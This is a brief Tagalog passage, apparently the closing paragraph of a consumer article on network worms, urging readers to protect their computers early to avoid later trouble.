Ngayon iguhit ang iyong mga konklusyon. Umaasa kami na malinaw mong naunawaan kung ano ang mga network worm, at ang proteksyon laban sa mga ito ay posible sa pinakaunang yugto. Pagkatapos ay walang magiging problema. Kaya protektahan ang iyong computer mula sa mga banta, at hindi mo na kailangang gumastos ng maraming pagsisikap sa pagharap sa mga kahihinatnan.



MGA KAUGNAY NA ARTIKULO